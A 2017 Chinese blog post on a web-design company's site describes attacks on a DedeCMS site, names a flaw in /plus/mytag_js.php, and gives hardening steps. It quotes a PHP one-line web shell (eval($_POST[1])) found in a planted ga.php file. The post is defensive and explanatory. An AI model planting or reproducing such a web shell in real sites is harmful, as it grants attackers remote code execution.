MENU 服務(wù) 案例
網(wǎng)站建設(shè)-網(wǎng)站設(shè)計(jì)-北京網(wǎng)站建設(shè)-高端網(wǎng)站制作公司-尚品中國(guó)
我們通過(guò)擁抱變化創(chuàng)造
360°的品牌價(jià)值__
簡(jiǎn)體
簡(jiǎn)體中文 English

尚品簽約辰欣藥業(yè)股份有限公司官網(wǎng)建設(shè)

類(lèi)型:尚品動(dòng)態(tài) 了解更多

談Dedecms一些隱患以及如何預(yù)防風(fēng)險(xiǎn)

來(lái)源:尚品中國(guó)| 類(lèi)型:網(wǎng)站百科| 時(shí)間:2017-11-30

 dedecms一直是很火的建站cms,主要得益于兩大站長(zhǎng)網(wǎng)的鼎力支持;不過(guò),人火是非多,cms太火了同樣會(huì)被別有用心的人盯上。我的網(wǎng)站一直在使用dedecms,前段時(shí)間又一次受到攻擊,攻擊的目的很簡(jiǎn)單,那么便是黑鏈,知道后稍微修改下代碼就恢復(fù)了,不是很?chē)?yán)重;這段時(shí)間網(wǎng)站又被莫名上傳文件,類(lèi)似前一次,雖然對(duì)方還沒(méi)來(lái)得及修改網(wǎng)站模板,不過(guò)這說(shuō)明網(wǎng)站安全防患還未到位,對(duì)方任何時(shí)候都可能再次取得管理員權(quán)限,所以要特別注意網(wǎng)站的安全防患措施。

  因?yàn)槲冶容^喜歡尋根究底,所以就去網(wǎng)上找了一下相關(guān)的資料,發(fā)現(xiàn)這確實(shí)是dedecms的漏洞,黑客可以利用多維的變量繞過(guò)正則檢測(cè),漏洞主要發(fā)生在/plus/mytag_js.php中,原理便是準(zhǔn)備一個(gè)MySQL數(shù)據(jù)庫(kù)來(lái)攻擊已知網(wǎng)站的數(shù)據(jù)庫(kù),通過(guò)向數(shù)據(jù)庫(kù)中寫(xiě)入一句話的代碼,只要成功寫(xiě)入,那么以后便可以利用這些代碼來(lái)獲得后臺(tái)管理員權(quán)限。

  結(jié)合我的網(wǎng)站被攻擊已經(jīng)別人類(lèi)似的經(jīng)歷來(lái)看,黑客寫(xiě)入的文件主要存在于/plus/文件夾下,目前已知的幾個(gè)文件包括ga.php、log.php、b.php、b1.php等,文件的特征便是短小,內(nèi)容很少,可能寫(xiě)入的時(shí)候不是很方便,不過(guò)這些代碼的作用確實(shí)不小的。

  下面這是ga.php文件中的部分代碼:

 

no
eval($_POST[1])
?>
 
no
eval($_POST[1])
?>
 
no
eval($_POST[1])
?>

  實(shí)際的代碼比上面截取的要長(zhǎng),不過(guò)都是這段代碼的重復(fù),至于log.php的代碼,同這個(gè)類(lèi)似,只有一句話,簡(jiǎn)單明了,如果你對(duì)網(wǎng)絡(luò)安全稍有了解,那么會(huì)知道是php一句話木馬,使用部分指定的工具可以執(zhí)行這段代碼,預(yù)計(jì)是破解密碼的功能。

  既然已經(jīng)知道對(duì)方是利用什么樣的漏洞,同時(shí)知道對(duì)方利用什么樣的原理來(lái)利用漏洞,那么要怎么預(yù)防這些危險(xiǎn)的事發(fā)生呢?經(jīng)過(guò)查詢(xún)大量的資料,我初步整理出下面這些預(yù)防漏洞被利用的步驟,希望對(duì)同樣適用dedecms的站長(zhǎng)朋友們有所幫助。

  一、升級(jí)版本打好補(bǔ)丁設(shè)置目錄權(quán)限

  這是官方對(duì)此的解決辦法,不管你使用的是什么版本的dedecms,都要及時(shí)在后臺(tái)升級(jí)版本自動(dòng)更新補(bǔ)丁,這是避免漏洞被利用的最重要的一步;同時(shí)官方還提供設(shè)置目錄的方法,主要是設(shè)置data、templets、uploads、a為可讀寫(xiě)不可執(zhí)行權(quán)限;include、member、plus、后臺(tái)管理目錄等設(shè)置為可執(zhí)行可讀不可寫(xiě)入權(quán)限;刪除install及special目錄,具體如何設(shè)置見(jiàn)官方說(shuō)明。

  二、修改admin賬號(hào)及密碼

  黑客可能是利用默認(rèn)admin賬號(hào),隨后推測(cè)密碼來(lái)破解的,所以修改默認(rèn)的admin賬號(hào)非常重要,至于如何修改,方法很多,比較有效的是用phpadmin登陸網(wǎng)站數(shù)據(jù)庫(kù),找到dede_admin數(shù)據(jù)庫(kù)表(dede是數(shù)據(jù)庫(kù)表前綴),修改其中userid及pwd兩項(xiàng),其中密碼一定要修改成f297a57a5a743894a0e4,這是默認(rèn)的密碼admin;修改后去后臺(tái)登陸,登陸dede后臺(tái)后修改密碼。

  三、別的值得注意的地方

  至于更多的細(xì)節(jié),同樣要注意,盡量別選擇太廉價(jià)的空間,太廉價(jià)的空間很容易出現(xiàn)服務(wù)器本身的安全問(wèn)題,只要服務(wù)器出現(xiàn)問(wèn)題,整個(gè)服務(wù)器下面的網(wǎng)站都沒(méi)救了。還有便是,如果沒(méi)必要,盡量別開(kāi)通會(huì)員注冊(cè)什么的,使用起來(lái)很麻煩;至于網(wǎng)站后臺(tái)目錄,不要寫(xiě)到robots.txt里面,同時(shí)每個(gè)月至少換一次,管理員密碼什么的同樣要更換,避免和別的賬號(hào)密碼相同被推測(cè)出來(lái)。

  經(jīng)過(guò)這幾次網(wǎng)站被攻擊的實(shí)例,不得不說(shuō),互聯(lián)網(wǎng)不是一個(gè)可以安心睡大覺(jué)的網(wǎng),作為站長(zhǎng),算是織網(wǎng)的人,更應(yīng)該注重網(wǎng)絡(luò)安全;只要按照要求去做到了這些防范措施,不說(shuō)100%,至少95%的可能不會(huì)被順利取得后臺(tái)權(quán)限。

來(lái)源聲明:本文章系尚品中國(guó)編輯原創(chuàng)或采編整理,如需轉(zhuǎn)載請(qǐng)注明來(lái)自尚品中國(guó)。以上內(nèi)容部分(包含圖片、文字)來(lái)源于網(wǎng)絡(luò),如有侵權(quán),請(qǐng)及時(shí)與本站聯(lián)系(010-60259772)。
TAG標(biāo)簽:

如果您的網(wǎng)站可以增加轉(zhuǎn)化次數(shù)并提高客戶(hù)滿(mǎn)意度,該怎么辦?

預(yù)約專(zhuān)業(yè)咨詢(xún)顧問(wèn)溝通!

*尚品專(zhuān)業(yè)顧問(wèn)將盡快與您聯(lián)系

免責(zé)聲明

非常感謝您訪問(wèn)我們的網(wǎng)站。在您使用本網(wǎng)站之前,請(qǐng)您仔細(xì)閱讀本聲明的所有條款。

1、本站部分內(nèi)容來(lái)源自網(wǎng)絡(luò),涉及到的部分文章和圖片版權(quán)屬于原作者,本站轉(zhuǎn)載僅供大家學(xué)習(xí)和交流,切勿用于任何商業(yè)活動(dòng)。

2、本站不承擔(dān)用戶(hù)因使用這些資源對(duì)自己和他人造成任何形式的損失或傷害。

3、本聲明未涉及的問(wèn)題參見(jiàn)國(guó)家有關(guān)法律法規(guī),當(dāng)本聲明與國(guó)家法律法規(guī)沖突時(shí),以國(guó)家法律法規(guī)為準(zhǔn)。

4、如果侵害了您的合法權(quán)益,請(qǐng)您及時(shí)與我們,我們會(huì)在第一時(shí)間刪除相關(guān)內(nèi)容!

聯(lián)系方式:010-60259772
電子郵件:394588593@qq.com

現(xiàn)在就與專(zhuān)業(yè)咨詢(xún)顧問(wèn)溝通!

  • 全國(guó)服務(wù)熱線

    400-700-4979

  • 北京服務(wù)熱線

    010-60259772

信息保護(hù)中請(qǐng)放心填寫(xiě)
在線咨詢(xún)

免責(zé)聲明

非常感謝您訪問(wèn)我們的網(wǎng)站。在您使用本網(wǎng)站之前,請(qǐng)您仔細(xì)閱讀本聲明的所有條款。

1、本站部分內(nèi)容來(lái)源自網(wǎng)絡(luò),涉及到的部分文章和圖片版權(quán)屬于原作者,本站轉(zhuǎn)載僅供大家學(xué)習(xí)和交流,切勿用于任何商業(yè)活動(dòng)。

2、本站不承擔(dān)用戶(hù)因使用這些資源對(duì)自己和他人造成任何形式的損失或傷害。

3、本聲明未涉及的問(wèn)題參見(jiàn)國(guó)家有關(guān)法律法規(guī),當(dāng)本聲明與國(guó)家法律法規(guī)沖突時(shí),以國(guó)家法律法規(guī)為準(zhǔn)。

4、如果侵害了您的合法權(quán)益,請(qǐng)您及時(shí)與我們,我們會(huì)在第一時(shí)間刪除相關(guān)內(nèi)容!

聯(lián)系方式:010-60259772
電子郵件:394588593@qq.com